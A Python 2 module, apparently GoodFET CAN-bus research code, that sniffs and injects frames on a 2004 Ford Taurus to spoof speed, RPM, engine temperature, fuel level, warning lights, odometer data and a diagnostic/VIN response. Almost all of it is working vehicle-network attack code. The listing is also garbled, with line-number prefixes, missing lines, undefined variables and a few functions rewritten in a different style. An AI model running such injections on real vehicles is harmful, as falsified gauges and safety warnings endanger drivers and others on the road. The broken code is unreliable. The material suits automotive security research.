4 import csv, time, argparse;
8 from random import randrange
9 from GoodFETMCPCAN import GoodFETMCPCAN;
10 from experiments import experiments
11 from GoodFETMCPCANCommunication import GoodFETMCPCANCommunication
12 from intelhex import IntelHex;
18 class FordExperiments(experiments):
20 This class is a subclass of experiments and is a car-specific module for
21 demonstrating and testing hacks.
def __init__(self, dataLocation = "../../contrib/ThayerData/"):
    """Initialise the experiment object through the CAN communication initialiser.

    @param dataLocation: path passed unchanged to
        GoodFETMCPCANCommunication.__init__; defaults to the ThayerData
        directory under contrib.
    """
    # NOTE(review): the class statement names `experiments` as the base, yet
    # the initialiser invoked here belongs to GoodFETMCPCANCommunication, and
    # the cooperative super() call below was left disabled by the author.
    # Confirm that `experiments` derives from GoodFETMCPCANCommunication;
    # otherwise Python 2 rejects this unbound-method call.
    GoodFETMCPCANCommunication.__init__(self, dataLocation)
    #super(FordExperiments,self).__init__(self) #initialize chip
28 def mimic1056(self,packetData,runTime):
31 self.spitSetup(self.freq)
32 #FIGURE out how to clear buffers
33 self.addFilter([1056, 1056, 1056, 1056,1056, 1056], verbose=False)
34 packet1 = self.client.rxpacket();
36 packetParsed = self.client.packet2parsed(packet1);
37 #keep sniffing till we read a packet
38 while( packet1 == None or packetParsed.get('sID') != 1056 ):
39 packet1 = self.client.rxpacket()
41 packetParsed = self.client.packet2parsed(packet1)
42 recieveTime = time.time()
43 packetParsed = self.client.packet2parsed(packet1)
44 if( packetParsed['sID'] != 1056):
45 print "Sniffed wrong packet"
47 countInitial = ord(packetParsed['db3']) #initial count value
49 #set data packet to match what was sniffed or at least what was input
52 if(packetData.get(idx) == None):
53 packet.append(ord(packetParsed.get(idx)))
55 packet.append(packetData.get(idx))
57 #### split SID into different regs
58 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
59 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
60 packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
61 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
63 packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
65 self.client.txpacket(packet);
67 while( (time.time()-recieveTime) < runTime):
68 #care about db3 or packet[8] that we want to count at the rate that it is
69 dT = time.time()-tpast
71 db3 = (countInitial + math.floor((time.time()-recieveTime)/0.2))%255
73 self.client.txpacket(packet)
77 self.client.MCPrts(TXB0=True)
78 tpast = time.time() #update our transmit time on the one before
82 def cycledb1_1056(self,runTime):
86 #FIGURE out how to clear buffers
87 self.addFilter([1056, 1056, 1056, 1056,1056, 1056], verbose=False)
88 packet1 = self.client.rxpacket();
90 packetParsed = self.client.packet2parsed(packet1);
91 #keep sniffing till we read a packet
92 while( packet1 == None or packetParsed.get('sID') != 1056 ):
94 packet1 = self.client.rxpacket()
96 packetParsed = self.client.packet2parsed(packet1)
97 recieveTime = time.time()
98 packetParsed = self.client.packet2parsed(packet1)
99 if( packetParsed['sID'] != 1056):
100 print "Sniffed wrong packet"
103 #set data packet to match what was sniffed or at least what was input
106 packet.append(ord(packetParsed.get(idx)))
108 packet[1] = packetValue;
111 #### split SID into different regs
112 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
113 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
114 packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
115 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
116 # lower nibble is DLC
117 packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
119 self.client.txpacket(packet);
121 while( (time.time()-recieveTime) < runTime):
122 #care about db3 or packet[8] that we want to count at the rate that it is
123 dT = time.time()-tpast
126 #temp = ((packetValue+1))%2
128 # pV = packetValue%255
134 self.client.txpacket(packet)
136 tpast = time.time() #update our transmit time on the one before
139 def getBackground(self,sId):
141 This method gets the background packets for the given id. This
142 is a simple "background" retriever in that it returns the packet
143 that is of the given id that was sniffed off the bus.
145 self.client.serInit()
147 self.addFilter([sId,sId,sId,sId,sId,sId])
148 packet1 = self.client.rxpacket();
150 packetParsed = self.client.packet2parsed(packet1);
151 #keep sniffing till we read a packet
152 startTime = time.time()
153 while( (packet1 == None or packetParsed.get('sID') != sId) and (time.time() - startTime) < 5):
154 packet1 = self.client.rxpacket()
157 packetParsed = self.client.packet2parsed(packet1)
158 if( packet1 == None or packetParsed.get('sID') != sId):
159 print "exiting without packet"
160 #print "returning", packetParsed
161 #recieveTime = time.time()
164 def cycle4packets1279(self):
165 self.client.serInit()
168 self.addFilter([1279, 1279, 1279, 1279, 1279, 1279], verbose = False)
169 packetParsed = self.getBackground(1279)
171 if (packetParsed[db0] == 16):
172 # if it's the first of the four packets, replace the value in db7 with 83
173 packetParsed[db7] = 83
174 # transmit new packet
175 self.client.txpacket(packetParsed)
177 # otherwise, leave it alone
178 # transmit the same packet we read in
179 self.client.txpacket(packetParsed)
180 # print the packet we are transmitting
183 def oscillateMPH(self,runTime):
184 self.client.serInit()
186 #FIGURE out how to clear buffers
187 self.addFilter([513, 513, 513, 513,513, 513], verbose=False)
188 packetParsed = self.getBackground(513)
190 #set data packet to match what was sniffed or at least what was input
193 packet.append(packetParsed.get(idx))
195 packet[1] = packetValue;
198 #### split SID into different regs
199 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
200 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
201 packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
202 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
203 # lower nibble is DLC
204 packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
206 self.client.txpacket(packet);
207 startTime = tT.time()
208 while( (tT.time()-startTime) < runTime):
209 dt = tT.time()-startTime
210 inputValue = ((2.0*math.pi)/20.0)*dt
211 value = 35*math.sin(inputValue)+70
217 #packet[9] = int(value)
218 packet[5] = int(value)
220 self.client.txpacket(packet)
222 def oscillateTemperature(self,runTime):
228 self.client.serInit()
230 #FIGURE out how to clear buffers
231 self.addFilter([1056, 1056, 1056, 1056,1056, 1056], verbose=False)
232 packetParsed = self.getBackground(1056)
234 #set data packet to match what was sniffed or at least what was input
237 packet.append(packetParsed.get(idx))
239 packet[1] = packetValue;
242 #### split SID into different regs
243 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
244 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
245 packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
246 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
247 # lower nibble is DLC
248 packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
250 self.client.txpacket(packet);
251 startTime = tT.time()
252 while( (tT.time()-startTime) < runTime):
253 dt = tT.time()-startTime
254 inputValue = ((2.0*math.pi)/20.0)*dt
255 value = 30*math.sin(inputValue)+130
257 #packet[5] = int(value)
264 self.client.txpacket(packet)
266 #tpast = time.time() #update our transmit time on the one before
271 #reset everything on the chip
272 self.client.serInit()
274 duration = 20; #seconds
277 listenPacket = [2, 9, 6, 153, 153, 153, 153, 153]
279 #actual response by the car
280 #r1 = [34, 88, 0, 0, 0, 0, 0, 0]
281 #r2 = [33, 75, 50, 78, 51, 46, 72, 69 ]
282 #r3 = [16, 19, 73, 4, 1, 70, 65, 66]
284 r1 = [34, 88, 0, 0, 0, 0, 0, 0]
285 r2 = [33, 75, 50, 78, 51, 46, 72, 69 ]
286 r3 = [16, 19, 73, 160, 159, 70, 65, 66]
289 SIDlow = (responseID & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
290 SIDhigh = (responseID >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
291 packet1 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
292 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
293 # lower nibble is DLC
294 r1[0],r1[1],r1[2],r1[3],r1[4],r1[5],r1[6],r1[7]]
295 packet2 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
296 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
297 # lower nibble is DLC
298 r2[0],r2[1],r2[2],r2[3],r2[4],r2[5],r2[6],r2[7]]
299 packet3 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
300 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
301 # lower nibble is DLC
302 r3[0],r3[1],r3[2],r3[3],r3[4],r3[5],r3[6],r3[7]]
304 self.multiPacketSpit(packet0 = r1, packet1 = r2, packet2 = r3, packet0rts = True, packet1rts = True, packet2rts = True)
306 #filter for the correct packet
307 self.filterForPacket(listenID, listenPacket[0],listenPacket[1], verbose = True)
308 self.client.rxpacket()
309 self.client.rxpacket() # flush buffers if there is anything
310 startTime = tT.time()
311 while( (tT.time() -startTime) < duration):
312 packet = self.client.rxpacket()
314 sid = ord(packet[0])<<3 | ord(packet[1])>>5
315 if( sid == listenID):
316 byte3 = ord(packet[6])
317 if( byte3 == listenPacket[3]):
318 print "SendingPackets!"
320 self.multpackSpit(packet0rts=True,packet1rts=True,packet2rts=True)
322 def setScanToolTemp(self,temp):
323 self.client.serInit()
326 self.addFilter([2024, 2024, 2024])
327 self.client.rxpacket()
328 self.client.rxpacket()
329 self.client.rxpacket()
330 SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
331 SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
333 startTime = time.time()
334 #while((time.time() - startTime) < 10):
338 # catch a packet and check its db4 value
339 while (packet == None):
340 packet=self.client.rxpacket();
343 newTemp = math.ceil(level/1.8 + 22)
344 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
347 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
348 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
349 # lower nibble is DLC
350 ord(packet[5]),ord(packet[6]),ord(packet[7]),newTemp,ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
352 # load new packet into TXB0 and check time
353 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
354 starttime = time.time()
356 # spit new value for 1 second
357 while (time.time()-starttime < 10):
358 self.multiPacketSpit(packet0rts=True)
360 def setEngineTemp(self,temp):
361 self.client.serInit()
364 self.addFilter([1056, 1056, 1056,1056,1056,1056])
365 self.client.rxpacket()
366 self.client.rxpacket()
367 self.client.rxpacket()
368 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
369 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
371 startTime = time.time()
372 #while((time.time() - startTime) < 10):
376 # catch a packet and check its db4 value
377 while (packet == None):
378 packet=self.client.rxpacket();
381 newTemp = int(math.ceil(level/1.8 + 22))
382 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
385 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
386 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
387 # lower nibble is DLC
388 newTemp,ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
390 # load new packet into TXB0 and check time
391 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
392 starttime = time.time()
394 # spit new value for 1 second
395 while (time.time()-starttime < 10):
396 self.multiPacketSpit(packet0rts=True)
398 def overHeatEngine(self):
399 self.client.serInit()
402 self.addFilter([1056, 1056, 1056])
403 packet = self.getBackground(1056)
404 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
405 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
407 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
408 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
409 # lower nibble is DLC
410 0xfa,packet['db1'],packet['db2'],packet['db3'],packet['db4'],packet['db5'],packet['db6'],packet['db7']]
411 startTime = time.time()
412 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
413 while( time.time()- startTime < 10):
414 self.multiPacketSpit(packet0rts=True)
416 def runOdometer(self):
417 self.client.serInit()
420 self.addFilter([1056, 1056, 1056])
421 packet = self.getBackground(1056)
422 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
423 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
424 odomFuzz = random.randint(1,254)
426 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
427 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
428 # lower nibble is DLC
429 packet['db0'],packet['db1'],packet['db2'],packet['db3'],packet['db4'],packet['db5'],packet['db6'],packet['db7']]
431 startTime = time.time()
432 packet[6] = odomFuzz;
433 while( time.time()- startTime < 10):
434 odomFuzz = random.randint(1,254)
435 newPacket[6] = odomFuzz
436 self.client.txpacket(newPacket)
438 def setDashboardTemp(self, temp):
439 self.client.serInit()
442 self.addFilter([1056, 1056, 1056])
443 self.client.rxpacket()
444 self.client.rxpacket()
445 self.client.rxpacket()
446 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
447 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
449 startTime = time.time()
450 #while((time.time() - startTime) < 10):
454 # catch a packet and check its db4 value
455 while (packet == None):
456 packet=self.client.rxpacket();
459 newTemp = math.ceil(level/1.8 + 22)
460 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
463 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
464 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
465 # lower nibble is DLC
466 newTemp,ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
468 # load new packet into TXB0 and check time
469 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
470 starttime = time.time()
472 # spit new value for 1 second
473 while (time.time()-starttime < 10):
474 self.multiPacketSpit(packet0rts=True)
477 def warningLightsOn(self,checkEngine, checkTransmission, transmissionOverheated, engineLight, battery, fuelCap, checkBreakSystem,ABSLight, dashB):
479 if( checkBreakSystem == 1 or ABSLight == 1):
480 SIDlow = (530 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
481 SIDhigh = (530 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
482 print "looking for 530"
483 packet = self.getBackground(530)
485 packet2 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
486 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
487 # lower nibble is DLC
488 packet['db0'],packet['db1'],packet['db2'],packet['db3'],packet['db4'],packet['db5'],packet['db6'],packet['db7']]
489 if( checkBreakSystem == 1 and ABSLight == 1):
491 elif( checkBreakSystem == 0 and ABSLight == 1):
493 elif(checkBreakSystem==1 and ABSLight == 0):
500 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
501 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
502 print "looking for 1056"
503 packet = self.getBackground(1056)
505 packet1 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
506 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
507 # lower nibble is DLC
508 packet['db0'],packet['db1'],packet['db2'],packet['db3'],packet['db4'],packet['db5'],packet['db6'],packet['db7']]
509 if( checkEngine == 1):
512 if( checkTransmission == 1):
515 if( transmissionOverheated == 1):
518 if( engineLight == 1):
530 self.client.serInit()
532 # load new packet into TXB0 and check time
533 self.multiPacketSpit(packet0=packet1,packet1=packet2, packet0rts=True,packet1rts=packet2rts )
534 starttime = time.time()
536 # spit new value for 1 second
537 while ((time.time()-starttime) < 10):
538 self.multiPacketSpit(packet0rts=True,packet1rts = packet2rts)
540 def fakeScanToolFuelLevel(self,level):
541 self.client.serInit()
544 self.addFilter([2024, 2024, 2024])
545 self.client.rxpacket()
546 self.client.rxpacket()
547 self.client.rxpacket()
548 SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
549 SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
551 startTime = time.time()
552 #while((time.time() - startTime) < 10):
556 # catch a packet and check its db4 value
557 while (packet == None):
558 packet=self.client.rxpacket();
560 level = int(level/.4)
561 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
564 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
565 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
566 # lower nibble is DLC
567 3,65,47,level,ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
569 # load new packet into TXB0 and check time
570 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
571 starttime = time.time()
573 # spit new value for 1 second
574 while (time.time()-starttime < 10):
575 self.multiPacketSpit(packet0rts=True)
577 def fakeOutsideTemp(self,level):
578 self.client.serInit()
581 self.addFilter([2024, 2024, 2024,2024,2024,2024])
582 self.client.rxpacket()
583 self.client.rxpacket()
584 self.client.rxpacket()
585 SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
586 SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
588 startTime = time.time()
589 #while((time.time() - startTime) < 10):
593 # catch a packet and check its db4 value
594 while (packet == None):
595 packet=self.client.rxpacket();
597 newTemp = int(math.ceil(level/1.8 + 22))
598 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
601 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
602 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
603 # lower nibble is DLC
604 03,65,70,newTemp,0,0,0,0]
606 # load new packet into TXB0 and check time
607 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
608 starttime = time.time()
610 # spit new value for 1 second
611 while (time.time()-starttime < 10):
612 self.multiPacketSpit(packet0rts=True)
615 def fakeAbsTps(self,level):
616 self.client.serInit()
619 self.addFilter([2024, 2024, 2024])
620 self.client.rxpacket()
621 self.client.rxpacket()
622 self.client.rxpacket()
623 SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
624 SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
626 startTime = time.time()
627 #while((time.time() - startTime) < 10):
631 # catch a packet and check its db4 value
632 while (packet == None):
633 packet=self.client.rxpacket();
635 abstps = int(math.ceil(level/.39))
639 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
640 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
641 # lower nibble is DLC
642 ord(packet[5]),ord(packet[6]),ord(packet[7]),abstps,ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
644 # load new packet into TXB0 and check time
645 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
646 starttime = time.time()
648 # spit new value for 1 second
649 while (time.time()-starttime < 10):
650 self.multiPacketSpit(packet0rts=True)
def mphToByteValue(self, mph):
    """Convert a speed in mph into the raw value carried in the speed data byte.

    This is the algebraic inverse of the decoding formula used elsewhere in
    this file, mph = 1.617 * byte - 63.5.

    @param mph: speed in miles per hour.
    @return: the un-rounded value as a float; the result is neither truncated
        nor range-checked here, so a caller that needs a single byte must
        convert and bound it itself.
    """
    shifted_speed = mph + 63.5
    return shifted_speed / 1.617
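def ByteValuToMph(self, value):
    """Convert a raw speed data-byte value into miles per hour.

    Applies mph = 1.617 * value - 63.5, the inverse of mphToByteValue.

    The previous body ignored its argument and read ord(packet[9]) from a
    name `packet` that is neither a parameter nor a local, so a call could
    not succeed unless a global of that name happened to exist. The
    parameter is now used directly, matching how ValueTorpm treats `value`.

    @param value: numeric byte value. A caller holding a raw one-character
        string taken from a received packet should apply ord() first.
    @return: the speed in mph as a float.
    """
    return 1.617 * value - 63.5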
660 def setMPH(self, mph):
661 self.client.serInit()
664 self.addFilter([513, 513, 513])
665 self.client.rxpacket()
666 self.client.rxpacket()
667 self.client.rxpacket()
668 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
669 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
671 SID2 = (1056 & 0x07) << 5;
672 SID2high = (1056 >>3) & 0xFF;
673 packet_odometer = [SID2high, SID2, 0 ,0,8, 65, 0, 32, 120, 0, 0, 1, 247]
675 startTime = time.time()
676 #while((time.time() - startTime) < 10):
680 # catch a packet and check its db4 value
681 while (packet == None):
682 packet=self.client.rxpacket();
684 #print self.client.packet2str(packet)
686 #print "DB4 = %02d " %ord(packet[9])
688 #print "Current MPH = 1.617(%d)-63.5 = %d" %(ord(packet[9]), mph)
690 # calculate our new mph and db4 value
692 newSpeed = self.mphToByteValue(mph)
693 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
696 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
697 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
698 # lower nibble is DLC
699 ord(packet[5]),ord(packet[6]),ord(packet[7]),ord(packet[8]),int(newSpeed),ord(packet[10]),ord(packet[11]),ord(packet[12])]
701 # load new packet into TXB0 and check time
702 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
703 starttime = time.time()
705 # spit new value for 1 second
706 while (time.time()-starttime < 10):
707 #self.multiPacketSpit(packet0rts=True)
708 odomFuzz = random.randint(1,254)
709 packet_odometer[6] = odomFuzz
710 self.multiPacketSpit(packet0=newPacket, packet1 =packet_odometer,packet0rts = True, packet1rts=True)
712 def speedometerHack(self, inputs):
714 self.client.serInit()
717 self.addFilter([513, 513, 513])
719 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
720 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
726 # catch a packet and check its db4 value
727 while (packet == None):
728 packet=self.client.rxpacket();
730 print self.client.packet2str(packet)
732 print "DB4 = %02d " %ord(packet[9])
733 mph = 1.617*ord(packet[9]) - 63.5
734 print "Current MPH = 1.617(%d)-63.5 = %d" %(ord(packet[9]), mph)
736 # calculate our new mph and db4 value
737 mph = mph + inputs[0];
738 newSpeed = ( mph + 63.5 ) / 1.617
739 print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
742 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
743 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
744 # lower nibble is DLC
745 ord(packet[5]),ord(packet[6]),ord(packet[7]),ord(packet[8]),int(newSpeed),ord(packet[10]),ord(packet[11]),ord(packet[12])]
747 # load new packet into TXB0 and check time
748 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
749 starttime = time.time()
751 # spit new value for 1 second
752 while (time.time()-starttime < 1):
754 self.multiPacketSpit(packet0rts=True)
756 def rpmToByteValue(self, rpm):
757 value = ( rpm + 61.88 ) / 64.5
760 def ValueTorpm(self, value):
761 rpm = 64.5*value - 61.88
764 def setRPM(self, rpm):
765 self.client.serInit()
768 self.addFilter([513, 513, 513,513])
770 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
771 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
774 self.client.rxpacket()
775 self.client.rxpacket()
776 self.client.rxpacket()
778 startTime = tT.time()
779 while((tT.time() - startTime )< 10):
783 # catch a packet and check its db4 value
784 while (packet == None):
785 packet=self.client.rxpacket();
787 #print self.client.packet2str(packet)
789 #print "DB4 = %02d " %ord(packet[5])
791 #print "Current RPM = 64.5(%d)-61.88 = %d" %(ord(packet[5]), rpm)
793 newRPM = self.rpmToByteValue(rpm)
794 #print "Fake RPM = 64.5(%d)-61.88 = %d" %(newRPM, rpm)
797 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
798 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
799 # lower nibble is DLC
800 int(newRPM),ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
802 # load new packet into TXB0 and check time
803 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
804 starttime = time.time()
806 # spit new value for 1 second
807 while (time.time()-starttime < 1):
808 self.multiPacketSpit(packet0rts=True)
810 def rpmHack(self, inputs):
812 This method will increase the rpm by the given rpm amount.
815 @param inputs: Single element of a list that corresponds to the amount the user
819 self.client.serInit()
822 self.addFilter([513, 513, 513])
824 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
825 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
826 startTime = tT.time()
827 while((tT.time() - startTime )< 10):
831 # catch a packet and check its db4 value
832 while (packet == None):
833 packet=self.client.rxpacket();
835 print self.client.packet2str(packet)
837 print "DB4 = %02d " %ord(packet[5])
838 rpm = 64.5*ord(packet[5]) - 61.88
839 print "Current RPM = 64.5(%d)-61.88 = %d" %(ord(packet[5]), rpm)
841 # calculate our new mph and db4 value
842 rpm = rpm + inputs[0];
843 newRPM = ( rpm + 61.88 ) / 64.5
845 print "Fake RPM = 64.5(%d)-61.88 = %d" %(newRPM, rpm)
848 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
849 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
850 # lower nibble is DLC
851 int(newRPM),ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
853 # load new packet into TXB0 and check time
854 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
855 starttime = time.time()
857 # spit new value for 1 second
858 while (time.time()-starttime < 1):
859 self.multiPacketSpit(packet0rts=True)
861 def imbeethovenbitch(self):
864 ### USUAL SETUP STUFF ######
865 self.client.serInit()
867 self.addFilter([513, 513, 513,513])
868 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
869 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
872 self.client.rxpacket()
873 self.client.rxpacket()
874 self.client.rxpacket()
879 #catch a packet to mutate
880 while (packet == None):
881 packet=self.client.rxpacket();
882 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
883 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
884 # lower nibble is DLC
885 ord(packet[5]),ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
888 # NOW THE FUN STUFF!!!!!
890 music = wave.open("../../contrib/ted/beethovensfifth.wav", 'r');
891 print "number of frames: %d " %music.getnframes()
892 print "number of channels: %d " %music.getnchannels()
893 print "sample width: %d " %music.getsampwidth()
894 print "framerate: %d " %music.getframerate()
895 print "compression: %s " %music.getcompname()
898 numFramesToRead = music.getframerate()*.05 # grab .1s of audio
906 sample = music.readframes(int(numFramesToRead)) # grab .1s of audio
910 for i in range(0, length,4):
911 runningSum += ord(sample[i]) #average the dual-channel
912 runningSum += ord(sample[i+2])
914 avg = math.fabs(runningSum/(length /2) -127) # we used 2 of every 4 frames, so divide length by 2
916 avg = (avg+avgprev)/2
919 val = int(avg*15 + 40) # normalize to speedometer range of values
921 print "speedometerVal = %f " %val;
922 print "speed = %f" %(1.617*val-63.5) # speed we're trying to display
924 if (val > 255): # ensure we don't run off acceptable range
929 newPacket[9] = int(val) # write it to the packet
931 # load new packet into TXB0 and check time
932 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
933 starttime = time.time()
935 # spit new value for 1 second
936 while (time.time()-starttime < .1):
937 self.multiPacketSpit(packet0rts=True)
941 # normalize to our range of values (conversion 1.6167*x-63.5
945 #number of frames: 7133184
946 #number of channels: 2
947 #sample width: 2 --> 2 bytes per sample
950 def engineDiagnostic(self, data):
951 self.client.serInit()
953 self.addFilter([513, 513, 513,513,513,513])
955 startTime = tT.time()
956 while((tT.time() - startTime ) < 15):
959 #catch a packet to decode
960 while (packet == None):
961 packet=self.client.rxpacket();
963 rpm = 64.5 * ord(packet[5]) - 61.88
964 mph = 1.617 * ord(packet[9]) - 63.5
965 print "putting data in"
966 data.put("Engine RPM: %d Current Speed: %d mph\n"%(rpm, mph))
973 if __name__ == "__main__":
975 parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,description='''\
977 Run Hacks on a Ford taurus 2004:
983 parser.add_argument('verb', choices=['speedometerHack', 'rpmHack', 'thefifth']);
984 parser.add_argument('-v', '--variable', type=int, action='append', help='Input values to the method of choice', default=None);
987 args = parser.parse_args();
988 inputs = args.variable
989 fe = FordExperiments("../../contrib/ThayerData/");
991 if( args.verb == 'speedometerHack'):
992 fe.speedometerHack(inputs=inputs)
993 if( args.verb == 'rpmHack'):
994 fe.rpmHack(inputs=inputs)
995 elif( args.verb == 'fakeVIN'):
997 elif( args.verb == 'thefifth'):
998 fe.imbeethovenbitch()